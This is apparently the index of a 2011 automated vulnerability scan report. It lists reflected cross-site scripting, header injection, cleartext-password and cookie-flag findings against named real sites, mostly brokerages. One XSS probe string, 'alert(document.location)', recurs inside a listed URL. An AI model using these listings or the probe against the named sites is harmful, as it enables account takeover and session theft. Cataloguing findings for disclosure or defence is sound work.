XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, BHDB, 09082011-01

Report generated by XSS.CX at Thu Sep 08 19:14:33 GMT-06:00 2011.


1. HTTP header injection

1.1. http://pixel.everesttech.net/2164/cq [url parameter]

1.2. http://www.interactivebrokers.co.uk/contract_info/index.php [name of an arbitrarily supplied request parameter]

2. Cross-site scripting (reflected)

2.1. http://360.sorensonmedia.com/api/getPlayerData [vguid parameter]

2.2. https://account.optionsxpress.com/OpenAccount/Index [firm parameter]

2.3. https://account.optionsxpress.com/OpenAccount/Index [firm parameter]

2.4. https://account.optionsxpress.com/OpenAccount/Index [firm parameter]

2.5. http://jqueryui.com/themeroller/ [name of an arbitrarily supplied request parameter]

2.6. http://optionsxpress.tt.omtrdc.net/m2/optionsxpress/mbox/standard [mbox parameter]

2.7. http://transworld.websol.barchart.com/main.php [name of an arbitrarily supplied request parameter]

2.8. http://transworld.websol.barchart.com/main.php [page parameter]

2.9. http://webstation.barchart.com/eflogin.php [txtPassword parameter]

2.10. http://webstation.barchart.com/eflogin.php [txtUsername parameter]

2.11. https://www.barchart.com/register/realtime/css/_basicFormCSS.php [errorIds parameter]

2.12. http://www.efutures.com/faq.php [name of an arbitrarily supplied request parameter]

2.13. http://www.efutures.com/traders/news.php [name of an arbitrarily supplied request parameter]

2.14. http://www.futurestrading.com/managed-accounts/what-are-managed-futures.html [REST URL parameter 1]

2.15. http://www.globalfutures.com/index.asp [refid parameter]

2.16. http://www.google.com/advanced_search [name of an arbitrarily supplied request parameter]

2.17. http://www.interactivebrokers.com/mobile/index.php [name of an arbitrarily supplied request parameter]

2.18. http://www.interactivebrokers.com/mobile/index.php/images/btn_continuetowebsite.png [REST URL parameter 3]

2.19. http://www.interactivebrokers.com/mobile/index.php/images/btn_continuetowebsite.png [REST URL parameter 4]

2.20. http://www.interactivebrokers.com/mobile/index.php/images/btn_submit.png [REST URL parameter 3]

2.21. http://www.interactivebrokers.com/mobile/index.php/images/btn_submit.png [REST URL parameter 4]

2.22. http://www.interactivebrokers.com/mobile/index.php/images/request_app_iblogo.png [REST URL parameter 3]

2.23. http://www.interactivebrokers.com/mobile/index.php/images/request_app_iblogo.png [REST URL parameter 4]

2.24. http://www.interactivebrokers.com/mobile/index.php/m.css [REST URL parameter 3]

2.25. https://www.interactivebrokers.com/sso/Login [forwardTo parameter]

2.26. http://www.invest-store.com/cgi-bin/commoditybooks-bin/category.cgi [page parameter]

2.27. http://www.invest-store.com/cgi-bin/commoditybooks-bin/home.cgi [division parameter]

2.28. http://www2.daytrade4less.com/livesupport/image.php [l parameter]

2.29. http://www2.daytrade4less.com/livesupport/js/status_image.php [base_url parameter]

2.30. http://www.pfgbest.com/toolkit/ [Referer HTTP header]

2.31. http://finance.yahoo.com/news/Retail-gasoline-prices-up-apf-2916275523.html [REST URL parameter 1]

3. Flash cross-domain policy

3.1. http://360.sorensonmedia.com/crossdomain.xml

3.2. http://cdn-static.viddler.com/crossdomain.xml

3.3. http://cdn-thumbs.viddler.com/crossdomain.xml

3.4. http://cdn.static.viddler.com/crossdomain.xml

3.5. http://cdnimages.sorensonmedia.com/crossdomain.xml

3.6. http://cdnvideos.sorensonmedia.com/crossdomain.xml

3.7. http://load.tubemogul.com/crossdomain.xml

3.8. http://optionsxpress.tt.omtrdc.net/crossdomain.xml

3.9. http://pixel.everesttech.net/crossdomain.xml

3.10. http://rcv-srv20.inplay.tubemogul.com/crossdomain.xml

3.11. http://receive.inplay.tubemogul.com/crossdomain.xml

3.12. http://static.cdn.360.sorensonmedia.com/crossdomain.xml

3.13. http://stats.optionsxpress.com/crossdomain.xml

3.14. http://tags.bluekai.com/crossdomain.xml

3.15. http://www.viddler.com/crossdomain.xml

3.16. http://206.106.137.34/crossdomain.xml

3.17. http://adadvisor.net/crossdomain.xml

3.18. https://adwords.google.com/crossdomain.xml

3.19. http://finance.yahoo.com/crossdomain.xml

3.20. http://picasaweb.google.com/crossdomain.xml

3.21. http://server.iad.liveperson.net/crossdomain.xml

3.22. https://server.iad.liveperson.net/crossdomain.xml

3.23. http://us.rd.yahoo.com/crossdomain.xml

3.24. http://www.adobe.com/crossdomain.xml

3.25. http://www.facebook.com/crossdomain.xml

3.26. http://www.nasdaqtrader.com/crossdomain.xml

3.27. http://www.thefinancials.com/crossdomain.xml

3.28. http://www.youtube.com/crossdomain.xml

3.29. https://account.optionsxpress.com/crossdomain.xml

3.30. https://docs.google.com/crossdomain.xml

3.31. http://pfgbest.app5.hubspot.com/crossdomain.xml

3.32. http://stats.manticoretechnology.com/crossdomain.xml

3.33. http://www.optionsxpress.com/crossdomain.xml

4. Silverlight cross-domain policy

4.1. http://contentcafe2.btol.com/clientaccesspolicy.xml

4.2. http://stats.optionsxpress.com/clientaccesspolicy.xml

5. Cleartext submission of password

5.1. http://webstation.barchart.com/eflogin.php

5.2. http://www.futurestrading.com/log-in.html

6. SSL cookie without secure flag set

6.1. https://www.optionsxpress.com/new_account.asp

6.2. https://www.optionsxpress.com/new_account.asp

6.3. https://www.optionsxpress.com/welcome.asp

6.4. https://account.optionsxpress.com/OpenAccount/Index

6.5. https://account.optionsxpress.com/OpenAccount/NewAccountAjax/GenericHandler

6.6. https://account.optionsxpress.com/OpenAccount/Scripts/nap.css

6.7. https://account.optionsxpress.com/OpenAccount/Scripts/napgeneral.js

6.8. https://account.optionsxpress.com/OpenAccount/Scripts/naponload.js

6.9. https://account.optionsxpress.com/OpenAccount/Scripts/napvalidate.js

6.10. https://account.optionsxpress.com/css/oxps.css

6.11. https://account.optionsxpress.com/favicon.ico

6.12. https://account.optionsxpress.com/images/btn_next_step.jpg

6.13. https://account.optionsxpress.com/images/icon_arrow.jpg

6.14. https://account.optionsxpress.com/images/icons/log_in.gif

6.15. https://account.optionsxpress.com/images/logos/firm/newlogo_ox.gif

6.16. https://account.optionsxpress.com/images/logos/firm/newlogo_oxb5a37alert(document.location)//18aaa9ddc45.gif

6.17. https://account.optionsxpress.com/images/minus_new_acct.gif

6.18. https://account.optionsxpress.com/images/newaccount/account_select1.gif

6.19. https://account.optionsxpress.com/images/newaccount/account_select2.gif

6.20. https://account.optionsxpress.com/images/newaccount/nap_error_icon.png

6.21. https://account.optionsxpress.com/images/newaccount/nap_tip_icon.gif

6.22. https://account.optionsxpress.com/images/openAccount_bottom.jpg

6.23. https://account.optionsxpress.com/images/plus_new_acct.gif

6.24. https://account.optionsxpress.com/images/rightColumn_divider.jpg

6.25. https://account.optionsxpress.com/images/styles/bubble/b.gif

6.26. https://account.optionsxpress.com/images/styles/bubble/bl.gif

6.27. https://account.optionsxpress.com/images/styles/bubble/br.gif

6.28. https://account.optionsxpress.com/images/styles/bubble/l.gif

6.29. https://account.optionsxpress.com/images/styles/bubble/r.gif

6.30. https://account.optionsxpress.com/images/styles/bubble/t.gif

6.31. https://account.optionsxpress.com/images/styles/bubble/tl.gif

6.32. https://account.optionsxpress.com/images/styles/bubble/tr.gif

6.33. https://account.optionsxpress.com/images/welcome/home/log_out.gif

6.34. https://account.optionsxpress.com/images/welcome/home/open_account_4.gif

6.35. https://account.optionsxpress.com/inc/general.js

6.36. https://account.optionsxpress.com/inc/interface.js

6.37. https://account.optionsxpress.com/inc/js/plugins/accordion.js

6.38. https://account.optionsxpress.com/inc/js/plugins/jquery.blockUI.js

6.39. https://account.optionsxpress.com/inc/newaccount/general.js

6.40. https://account.optionsxpress.com/inc/newaccount/jquer.ui.all.css

6.41. https://account.optionsxpress.com/inc/newaccount/jquery-1.3.2.min.js

6.42. https://account.optionsxpress.com/inc/newaccount/jquery.autotab.js

6.43. https://account.optionsxpress.com/inc/newaccount/jquery.scrollTo-min.js

6.44. https://account.optionsxpress.com/inc/newaccount/styles.css

6.45. https://account.optionsxpress.com/inc/s_code.js

6.46. https://adwords.google.com/um/StartNewLogin

6.47. https://icewebinar.webex.com/icewebinar/lsr.php

6.48. https://interactivebrokers.webex.com/interactivebrokers/lsr.php

6.49. https://interactivebrokers.webex.com/interactivebrokers/onstage/g.php

6.50. https://www.cqgtrader.com/Languages/USEng/main.asp

6.51. https://www.optionsxpress.com/downloads/financial_services_guide.pdf

6.52. https://www.optionsxpress.com/login.asp

6.53. https://www.pfgboss.com/Default.aspx

6.54. https://www.secureclient5.ranweb.com/login/ranweb.asp

7. Session token in URL

7.1. https://account.optionsxpress.com/inc/interface.js

7.2. https://cwt1.interactivebrokers.com/MT3G/servlet/LoginS

7.3. http://optionsxpress.tt.omtrdc.net/m2/optionsxpress/mbox/standard

7.4. https://www.interactivebrokers.com/Universal/servlet/AccountAccess.Logout

7.5. https://www.interactivebrokers.com/cstools/ib_app_help/

8. SSL certificate

8.1. https://cwt1.interactivebrokers.com/

8.2. https://www.barchart.com/

8.3. https://www.cqgtrader.com/

8.4. https://www.efutures.com/

8.5. https://www.interactivebrokers.com/

8.6. https://account.optionsxpress.com/

8.7. https://adwords.google.com/

8.8. https://docs.google.com/

8.9. https://icewebinar.webex.com/

8.10. https://interactivebrokers.webex.com/

8.11. https://mail.google.com/

8.12. https://online.optionsxpress.ca/

8.13. https://online.optionsxpress.com.sg/

8.14. https://online.optionsxpress.eu/

8.15. https://onlineint.optionsxpress.com/

8.16. https://seal.verisign.com/

8.17. https://server.iad.liveperson.net/

8.18. https://sites.google.com/

8.19. https://www.google.com/

8.20. https://www.optionsxpress.com/

8.21. https://www.optionsxpress.com.au/

8.22. https://www.pfgboss.com/

8.23. https://www.secureclient5.ranweb.com/

9. Cookie scoped to parent domain

9.1. http://pixel.everesttech.net/2164/cq

9.2. https://account.optionsxpress.com/OpenAccount/Index

9.3. https://account.optionsxpress.com/OpenAccount/NewAccountAjax/GenericHandler

9.4. https://account.optionsxpress.com/OpenAccount/Scripts/nap.css

9.5. https://account.optionsxpress.com/OpenAccount/Scripts/napgeneral.js

9.6. https://account.optionsxpress.com/OpenAccount/Scripts/naponload.js

9.7. https://account.optionsxpress.com/OpenAccount/Scripts/napvalidate.js

9.8. https://account.optionsxpress.com/css/oxps.css

9.9. https://account.optionsxpress.com/favicon.ico

9.10. https://account.optionsxpress.com/images/btn_next_step.jpg

9.11. https://account.optionsxpress.com/images/icon_arrow.jpg

9.12. https://account.optionsxpress.com/images/icons/log_in.gif

9.13. https://account.optionsxpress.com/images/logos/firm/newlogo_ox.gif

9.14. https://account.optionsxpress.com/images/logos/firm/newlogo_oxb5a37alert(document.location)//18aaa9ddc45.gif

9.15. https://account.optionsxpress.com/images/minus_new_acct.gif

9.16. https://account.optionsxpress.com/images/newaccount/account_select1.gif

9.17. https://account.optionsxpress.com/images/newaccount/account_select2.gif

9.18. https://account.optionsxpress.com/images/newaccount/nap_error_icon.png

9.19. https://account.optionsxpress.com/images/newaccount/nap_tip_icon.gif

9.20. https://account.optionsxpress.com/images/openAccount_bottom.jpg

9.21. https://account.optionsxpress.com/images/plus_new_acct.gif

9.22. https://account.optionsxpress.com/images/rightColumn_divider.jpg

9.23. https://account.optionsxpress.com/images/styles/bubble/b.gif

9.24. https://account.optionsxpress.com/images/styles/bubble/bl.gif

9.25. https://account.optionsxpress.com/images/styles/bubble/br.gif

9.26. https://account.optionsxpress.com/images/styles/bubble/l.gif

9.27. https://account.optionsxpress.com/images/styles/bubble/r.gif

9.28. https://account.optionsxpress.com/images/styles/bubble/t.gif

9.29. https://account.optionsxpress.com/images/styles/bubble/tl.gif

9.30. https://account.optionsxpress.com/images/styles/bubble/tr.gif

9.31. https://account.optionsxpress.com/images/welcome/home/log_out.gif

9.32. https://account.optionsxpress.com/images/welcome/home/open_account_4.gif

9.33. https://account.optionsxpress.com/inc/general.js

9.34. https://account.optionsxpress.com/inc/interface.js

9.35. https://account.optionsxpress.com/inc/js/plugins/accordion.js

9.36. https://account.optionsxpress.com/inc/js/plugins/jquery.blockUI.js

9.37. https://account.optionsxpress.com/inc/newaccount/general.js

9.38. https://account.optionsxpress.com/inc/newaccount/jquer.ui.all.css

9.39. https://account.optionsxpress.com/inc/newaccount/jquery-1.3.2.min.js

9.40. https://account.optionsxpress.com/inc/newaccount/jquery.autotab.js

9.41. https://account.optionsxpress.com/inc/newaccount/jquery.scrollTo-min.js

9.42. https://account.optionsxpress.com/inc/newaccount/styles.css

9.43. https://account.optionsxpress.com/inc/s_code.js

9.44. http://rcv-srv20.inplay.tubemogul.com/StreamReceiver/services

9.45. http://receive.inplay.tubemogul.com/StreamReceiver/demo

9.46. http://rtd.tubemogul.com/upi/pid/5w3jqr4k

9.47. http://server.iad.liveperson.net/hc/82583755/

9.48. http://shared.websol.barchart.com/css/bc_styles.css

9.49. http://www.facebook.com/dialog/feed

9.50. http://www.interactivebrokers.com/mkt/index.php

9.51. https://www.interactivebrokers.com/sso/Login

9.52. http://www.optionsxpress.com/

9.53. http://www.optionsxpress.com/404.aspx

9.54. http://www.optionsxpress.com/about_us/awards_media.aspx

9.55. http://www.optionsxpress.com/about_us/contact_us.aspx

9.56. http://www.optionsxpress.com/about_us/faq.aspx

9.57. http://www.optionsxpress.com/about_us/pricing_commissions.aspx

9.58. http://www.optionsxpress.com/check_us_out/right_for_you.aspx

9.59. http://www.optionsxpress.com/check_us_out/site_map.aspx

9.60. http://www.optionsxpress.com/corporate/about_us.aspx

9.61. http://www.optionsxpress.com/favicon.ico

9.62. http://www.optionsxpress.com/free_education/education_center.aspx

9.63. http://www.optionsxpress.com/free_education/live_events/

9.64. http://www.optionsxpress.com/free_education/virtual_trade.aspx

9.65. http://www.optionsxpress.com/images/promo_static/ox.gif

9.66. http://www.optionsxpress.com/images/promo_unique/divider.jpg

9.67. http://www.optionsxpress.com/images/promo_unique/live-help.jpg

9.68. http://www.optionsxpress.com/images/promo_unique/phone.jpg

9.69. http://www.optionsxpress.com/images/promo_unique/shadow.png

9.70. http://www.optionsxpress.com/images/promos/allInOne.png

9.71. http://www.optionsxpress.com/images/promos/barronsBg.png

9.72. http://www.optionsxpress.com/images/promos/chartC4c.jpg

9.73. http://www.optionsxpress.com/images/promos/footer1Logo11.png

9.74. http://www.optionsxpress.com/images/promos/kiplingerBg.png

9.75. http://www.optionsxpress.com/images/promos/mainBottom.png

9.76. http://www.optionsxpress.com/images/promos/toolsIcons.png

9.77. http://www.optionsxpress.com/images/promos/whiteboard_sales_lp.png

9.78. http://www.optionsxpress.com/images/ui/ui-bg_glass_65_ffffff_1x400.png

9.79. http://www.optionsxpress.com/images/ui/ui-bg_highlight-soft_50_0b457d_1x100.png

9.80. http://www.optionsxpress.com/images/ui/ui-bg_highlight-soft_50_125697_1x100.png

9.81. http://www.optionsxpress.com/images/welcome/home/log_out.gif

9.82. http://www.optionsxpress.com/images/welcome/home/open_account_4.gif

9.83. http://www.optionsxpress.com/inc/css/fonts.css

9.84. http://www.optionsxpress.com/inc/css/nav.css

9.85. http://www.optionsxpress.com/inc/css/print.css

9.86. http://www.optionsxpress.com/inc/css/screen.css

9.87. http://www.optionsxpress.com/inc/css/styles.css

9.88. http://www.optionsxpress.com/inc/css/ui.css

9.89. http://www.optionsxpress.com/inc/general.js

9.90. http://www.optionsxpress.com/inc/js/library.js

9.91. http://www.optionsxpress.com/inc/js/stats.js

9.92. http://www.optionsxpress.com/inc/js/xpress.js

9.93. http://www.optionsxpress.com/index.aspx

9.94. http://www.optionsxpress.com/our_products/futures.aspx

9.95. http://www.optionsxpress.com/our_products/more_choices.aspx

9.96. http://www.optionsxpress.com/our_products/options.aspx

9.97. http://www.optionsxpress.com/our_products/stocks.aspx

9.98. http://www.optionsxpress.com/promos/experience_an_options_specialist.aspx

9.99. http://www.optionsxpress.com/promos/none

9.100. http://www.optionsxpress.com/security_risks/disclosures.aspx

9.101. http://www.optionsxpress.com/security_risks/docs/privacy.aspx

9.102. http://www.optionsxpress.com/security_risks/financial_statement.aspx

9.103. http://www.optionsxpress.com/security_risks/risks_policies.aspx

9.104. http://www.optionsxpress.com/security_risks/security_center.aspx

9.105. http://www.optionsxpress.com/tools_research/ox_mobile.aspx

9.106. http://www.optionsxpress.com/tools_research/powerful_tools.aspx

9.107. http://www.optionsxpress.com/tools_research/xtend_2.aspx

9.108. http://www.optionsxpress.com/what_we_offer/free_account_transfers.aspx

9.109. http://www.optionsxpress.com/why_ox/

9.110. https://www.optionsxpress.com/downloads/financial_services_guide.pdf

9.111. https://www.optionsxpress.com/login.asp

9.112. https://www.optionsxpress.com/welcome.asp

9.113. http://www.youtube.com/results

10. Cookie without HttpOnly flag set

10.1. http://pixel.everesttech.net/2164/cq

10.2. https://www.interactivebrokers.com/Universal/servlet/AccountAccess.Login

10.3. https://www.interactivebrokers.com/Universal/servlet/AccountAccess.Logout

10.4. https://www.interactivebrokers.com/Universal/servlet/Registration_v3.formScreenPreReg

10.5. https://www.interactivebrokers.com/Universal/servlet/formWelcome

10.6. https://www.interactivebrokers.com/sso/Authenticator

10.7. https://www.interactivebrokers.com/sso/Login

10.8. https://www.optionsxpress.com/new_account.asp

10.9. https://www.optionsxpress.com/new_account.asp

10.10. https://www.optionsxpress.com/welcome.asp

10.11. http://360.sorensonmedia.com/7d285f50de540c4b64C9b74Y99dcc88d0ad6/embedv2.js

10.12. https://account.optionsxpress.com/OpenAccount/Index

10.13. https://account.optionsxpress.com/OpenAccount/NewAccountAjax/GenericHandler

10.14. https://account.optionsxpress.com/OpenAccount/Scripts/nap.css

10.15. https://account.optionsxpress.com/OpenAccount/Scripts/napgeneral.js

10.16. https://account.optionsxpress.com/OpenAccount/Scripts/naponload.js

10.17. https://account.optionsxpress.com/OpenAccount/Scripts/napvalidate.js

10.18. https://account.optionsxpress.com/css/oxps.css

10.19. https://account.optionsxpress.com/favicon.ico

10.20. https://account.optionsxpress.com/images/btn_next_step.jpg

10.21. https://account.optionsxpress.com/images/icon_arrow.jpg

10.22. https://account.optionsxpress.com/images/icons/log_in.gif

10.23. https://account.optionsxpress.com/images/logos/firm/newlogo_ox.gif

10.24. https://account.optionsxpress.com/images/logos/firm/newlogo_oxb5a37alert(document.location)//18aaa9ddc45.gif

10.25. https://account.optionsxpress.com/images/minus_new_acct.gif

10.26. https://account.optionsxpress.com/images/newaccount/account_select1.gif

10.27. https://account.optionsxpress.com/images/newaccount/account_select2.gif

10.28. https://account.optionsxpress.com/images/newaccount/nap_error_icon.png

10.29. https://account.optionsxpress.com/images/newaccount/nap_tip_icon.gif

10.30. https://account.optionsxpress.com/images/openAccount_bottom.jpg

10.31. https://account.optionsxpress.com/images/plus_new_acct.gif

10.32. https://account.optionsxpress.com/images/rightColumn_divider.jpg

10.33. https://account.optionsxpress.com/images/styles/bubble/b.gif

10.34. https://account.optionsxpress.com/images/styles/bubble/bl.gif

10.35. https://account.optionsxpress.com/images/styles/bubble/br.gif

10.36. https://account.optionsxpress.com/images/styles/bubble/l.gif

10.37. https://account.optionsxpress.com/images/styles/bubble/r.gif

10.38. https://account.optionsxpress.com/images/styles/bubble/t.gif

10.39. https://account.optionsxpress.com/images/styles/bubble/tl.gif

10.40. https://account.optionsxpress.com/images/styles/bubble/tr.gif

10.41. https://account.optionsxpress.com/images/welcome/home/log_out.gif

10.42. https://account.optionsxpress.com/images/welcome/home/open_account_4.gif

10.43. https://account.optionsxpress.com/inc/general.js

10.44. https://account.optionsxpress.com/inc/interface.js

10.45. https://account.optionsxpress.com/inc/js/plugins/accordion.js

10.46. https://account.optionsxpress.com/inc/js/plugins/jquery.blockUI.js

10.47. https://account.optionsxpress.com/inc/newaccount/general.js

10.48. https://account.optionsxpress.com/inc/newaccount/jquer.ui.all.css

10.49. https://account.optionsxpress.com/inc/newaccount/jquery-1.3.2.min.js

10.50. https://account.optionsxpress.com/inc/newaccount/jquery.autotab.js

10.51. https://account.optionsxpress.com/inc/newaccount/jquery.scrollTo-min.js

10.52. https://account.optionsxpress.com/inc/newaccount/styles.css

10.53. https://account.optionsxpress.com/inc/s_code.js

10.54. https://adwords.google.com/um/StartNewLogin

10.55. https://cwt1.interactivebrokers.com/webtrader2/servlet/login

10.56. http://finance.yahoo.com/news/Pacer-Adds-LNG-Trucks-to-bw-1749635685.html

10.57. http://finance.yahoo.com/news/Piedmont-Natural-Gas-prnews-2212692382.html

10.58. http://finance.yahoo.com/news/Primary-Petroleum-Present-iw-1675004773.html

10.59. http://finance.yahoo.com/news/Retail-gasoline-prices-up-apf-2916275523.html

10.60. http://finance.yahoo.com/news/US-Steel-converts-vehicles-to-apf-2954052497.html

10.61. https://icewebinar.webex.com/icewebinar/lsr.php

10.62. https://interactivebrokers.webex.com/interactivebrokers/lsr.php

10.63. https://interactivebrokers.webex.com/interactivebrokers/onstage/g.php

10.64. http://pfgbest.app5.hubspot.com/salog.js.aspx

10.65. http://rcv-srv20.inplay.tubemogul.com/StreamReceiver/services

10.66. http://receive.inplay.tubemogul.com/StreamReceiver/demo

10.67. http://rtd.tubemogul.com/upi/pid/5w3jqr4k

10.68. http://server.iad.liveperson.net/hc/82583755/

10.69. http://server.iad.liveperson.net/hc/82583755/

10.70. http://shared.websol.barchart.com/css/bc_styles.css

10.71. http://stats.manticoretechnology.com/Data/578/12867/3756E06F-E585-4584-AC1F-E9FCA21FAC0F/mtcLogData.asp

10.72. http://www.cqgtrader.com/

10.73. http://www.cqgtrader.com/Languages/USEng/main.asp

10.74. https://www.cqgtrader.com/Languages/USEng/main.asp

10.75. http://www.facebook.com/dialog/feed

10.76. http://www.globalfutures.com/index.asp

10.77. http://www.googleadservices.com/pagead/aclk

10.78. http://www.interactivebrokers.co.uk/favicon.ico

10.79. http://www.interactivebrokers.com/mkt/index.php

10.80. http://www.invest-store.com/images/button.gif

10.81. http://www.invest-store.com/images/go_button.gif

10.82. http://www.invest-store.com/images/mi_button.gif

10.83. http://www.invest-store.com/images/small/5197574.jpg

10.84. http://www.invest-store.com/images/small/8024.jpg

10.85. http://www.invest-store.com/images/small/9349587.jpg

10.86. http://www.invest-store.com/images/spacer1.gif

10.87. http://www.optionsxpress.com/

10.88. http://www.optionsxpress.com/404.aspx

10.89. http://www.optionsxpress.com/about_us/awards_media.aspx

10.90. http://www.optionsxpress.com/about_us/contact_us.aspx

10.91. http://www.optionsxpress.com/about_us/faq.aspx

10.92. http://www.optionsxpress.com/about_us/pricing_commissions.aspx

10.93. http://www.optionsxpress.com/check_us_out/right_for_you.aspx

10.94. http://www.optionsxpress.com/check_us_out/site_map.aspx

10.95. http://www.optionsxpress.com/corporate/about_us.aspx

10.96. http://www.optionsxpress.com/favicon.ico

10.97. http://www.optionsxpress.com/free_education/education_center.aspx

10.98. http://www.optionsxpress.com/free_education/live_events/

10.99. http://www.optionsxpress.com/free_education/virtual_trade.aspx

10.100. http://www.optionsxpress.com/images/promo_static/ox.gif

10.101. http://www.optionsxpress.com/images/promo_unique/divider.jpg

10.102. http://www.optionsxpress.com/images/promo_unique/live-help.jpg

10.103. http://www.optionsxpress.com/images/promo_unique/phone.jpg

10.104. http://www.optionsxpress.com/images/promo_unique/shadow.png

10.105. http://www.optionsxpress.com/images/promos/allInOne.png

10.106. http://www.optionsxpress.com/images/promos/barronsBg.png

10.107. http://www.optionsxpress.com/images/promos/chartC4c.jpg

10.108. http://www.optionsxpress.com/images/promos/footer1Logo11.png

10.109. http://www.optionsxpress.com/images/promos/kiplingerBg.png

10.110. http://www.optionsxpress.com/images/promos/mainBottom.png

10.111. http://www.optionsxpress.com/images/promos/toolsIcons.png

10.112. http://www.optionsxpress.com/images/promos/whiteboard_sales_lp.png

10.113. http://www.optionsxpress.com/images/ui/ui-bg_glass_65_ffffff_1x400.png

10.114. http://www.optionsxpress.com/images/ui/ui-bg_highlight-soft_50_0b457d_1x100.png

10.115. http://www.optionsxpress.com/images/ui/ui-bg_highlight-soft_50_125697_1x100.png

10.116. http://www.optionsxpress.com/images/welcome/home/log_out.gif

10.117. http://www.optionsxpress.com/images/welcome/home/open_account_4.gif

10.118. http://www.optionsxpress.com/inc/css/fonts.css

10.119. http://www.optionsxpress.com/inc/css/nav.css

10.120. http://www.optionsxpress.com/inc/css/print.css

10.121. http://www.optionsxpress.com/inc/css/screen.css

10.122. http://www.optionsxpress.com/inc/css/styles.css

10.123. http://www.optionsxpress.com/inc/css/ui.css

10.124. http://www.optionsxpress.com/inc/general.js

10.125. http://www.optionsxpress.com/inc/js/library.js

10.126. http://www.optionsxpress.com/inc/js/stats.js

10.127. http://www.optionsxpress.com/inc/js/xpress.js

10.128. http://www.optionsxpress.com/index.aspx

10.129. http://www.optionsxpress.com/our_products/futures.aspx

10.130. http://www.optionsxpress.com/our_products/more_choices.aspx

10.131. http://www.optionsxpress.com/our_products/options.aspx

10.132. http://www.optionsxpress.com/our_products/stocks.aspx

10.133. http://www.optionsxpress.com/promos/experience_an_options_specialist.aspx

10.134. http://www.optionsxpress.com/promos/none

10.135. http://www.optionsxpress.com/security_risks/disclosures.aspx

10.136. http://www.optionsxpress.com/security_risks/docs/privacy.aspx

10.137. http://www.optionsxpress.com/security_risks/financial_statement.aspx

10.138. http://www.optionsxpress.com/security_risks/risks_policies.aspx

10.139. http://www.optionsxpress.com/security_risks/security_center.aspx

10.140. http://www.optionsxpress.com/tools_research/ox_mobile.aspx

10.141. http://www.optionsxpress.com/tools_research/powerful_tools.aspx

10.142. http://www.optionsxpress.com/tools_research/xtend_2.aspx

10.143. http://www.optionsxpress.com/what_we_offer/free_account_transfers.aspx

10.144. http://www.optionsxpress.com/why_ox/

10.145. https://www.optionsxpress.com/downloads/financial_services_guide.pdf

10.146. https://www.optionsxpress.com/login.asp

10.147. https://www.secureclient5.ranweb.com/login/ranweb.asp

10.148. http://www.youtube.com/results

11. Password field with autocomplete enabled

11.1. https://cwt1.interactivebrokers.com/MT3G/servlet/LoginS

11.2. https://cwt1.interactivebrokers.com/MT3G/servlet/LoginS

11.3. https://cwt1.interactivebrokers.com/webtrader2/servlet/login

11.4. http://webstation.barchart.com/eflogin.php

11.5. https://www.barchart.com/register/realtime/

11.6. http://www.facebook.com/connect/prompt_feed.php

11.7. http://www.facebook.com/dialog/feed

11.8. http://www.futurestrading.com/log-in.html

11.9. https://www.pfgboss.com/Default.aspx

11.10. https://www.secureclient5.ranweb.com/login/ranweb.asp

12. Source code disclosure

12.1. https://account.optionsxpress.com/OpenAccount/Scripts/napvalidate.js

12.2. http://www.interactivebrokers.com/en/p.php

13. ASP.NET debugging enabled

13.1. https://account.optionsxpress.com/Default.aspx

13.2. https://online.optionsxpress.ca/Default.aspx

13.3. https://online.optionsxpress.com.sg/Default.aspx

13.4. https://online.optionsxpress.eu/Default.aspx

13.5. http://www.optionsxpress.com/Default.aspx

13.6. http://www.thefinancials.com/Default.aspx

14. Referer-dependent response

14.1. http://www.futurestrading.com/templates/system/css/error.css

14.2. http://www.viddler.com/player/cc4ac375/

15. Cross-domain POST

16. Cross-domain Referer leakage

16.1. https://account.optionsxpress.com/OpenAccount/Index

16.2. http://cm.g.doubleclick.net/pixel

16.3. http://pixel.everesttech.net/2164/cq

16.4. http://shared.websol.barchart.com/text/disclaimer.php

16.5. http://www.algoadvantage.com/

16.6. http://www.efutures.com/

16.7. http://www.farrdirect.com/

16.8. http://www.globalfutures.com/index.asp

16.9. http://www.google.com/search

16.10. http://www.interactivebrokers.com/en/accounts/advisors/advisorsMain.php

16.11. http://www.interactivebrokers.com/en/accounts/advisors/employeeTrackMain.php

16.12. http://www.interactivebrokers.com/en/accounts/brokers/brokerMain.php

16.13. http://www.interactivebrokers.com/en/accounts/institutions/fundMain.php

16.14. http://www.interactivebrokers.com/en/accounts/institutions/institutionalMain.php

16.15. http://www.interactivebrokers.com/en/general/about/awards.php

16.16. http://www.interactivebrokers.com/en/general/education/OptPriceAgreement.php

16.17. http://www.interactivebrokers.com/en/general/education/comparebrokers.php

16.18. http://www.interactivebrokers.com/en/general/education/webinars.php

16.19. http://www.interactivebrokers.com/en/general/notifications/ibchanges.php

16.20. http://www.interactivebrokers.com/en/p.php

16.21. http://www.interactivebrokers.com/en/p.php

16.22. http://www.interactivebrokers.com/en/p.php

16.23. http://www.interactivebrokers.com/en/p.php

16.24. http://www.interactivebrokers.com/en/p.php

16.25. http://www.interactivebrokers.com/en/p.php

16.26. http://www.interactivebrokers.com/en/p.php

16.27. http://www.interactivebrokers.com/en/pagemap/pagemap_education.php

16.28. http://www.interactivebrokers.com/en/pagemap/pagemap_newaccounts.php

16.29. http://www.interactivebrokers.com/en/site_map.php

16.30. http://www.interactivebrokers.com/en/software/downloadPlugin.php

16.31. http://www.interactivebrokers.com/en/software/pdfhighlights/PDF-FxTrader.php

16.32. http://www.interactivebrokers.com/en/software/pdfhighlights/PDF-TechAnalytics.php

16.33. http://www.interactivebrokers.com/en/software/systemStatus.php

16.34. http://www.interactivebrokers.com/en/software/twsDisclaimer.php

16.35. http://www.interactivebrokers.com/en/software/twsTutorial.php

16.36. http://www.interactivebrokers.com/en/trading/pdfhighlights/PDF-Forex.php

16.37. http://www.interactivebrokers.com/en/trading/pdfhighlights/PDF-OptionsDesk.php

16.38. http://www.invest-store.com/btc/

16.39. http://www.invest-store.com/cgi-bin/commoditybooks-bin/home.cgi

16.40. http://www.optionsxpress.com/promos/experience_an_options_specialist.aspx

16.41. http://www.zumo.com/

17. Cross-domain script include

17.1. https://account.optionsxpress.com/OpenAccount/Index

17.2. http://finance.yahoo.com/news/Pacer-Adds-LNG-Trucks-to-bw-1749635685.html

17.3. http://finance.yahoo.com/news/Piedmont-Natural-Gas-prnews-2212692382.html

17.4. http://finance.yahoo.com/news/Primary-Petroleum-Present-iw-1675004773.html

17.5. http://finance.yahoo.com/news/Retail-gasoline-prices-up-apf-2916275523.html

17.6. http://finance.yahoo.com/news/US-Steel-converts-vehicles-to-apf-2954052497.html

17.7. http://jqueryui.com/themeroller/

17.8. http://www.algoadvantage.com/

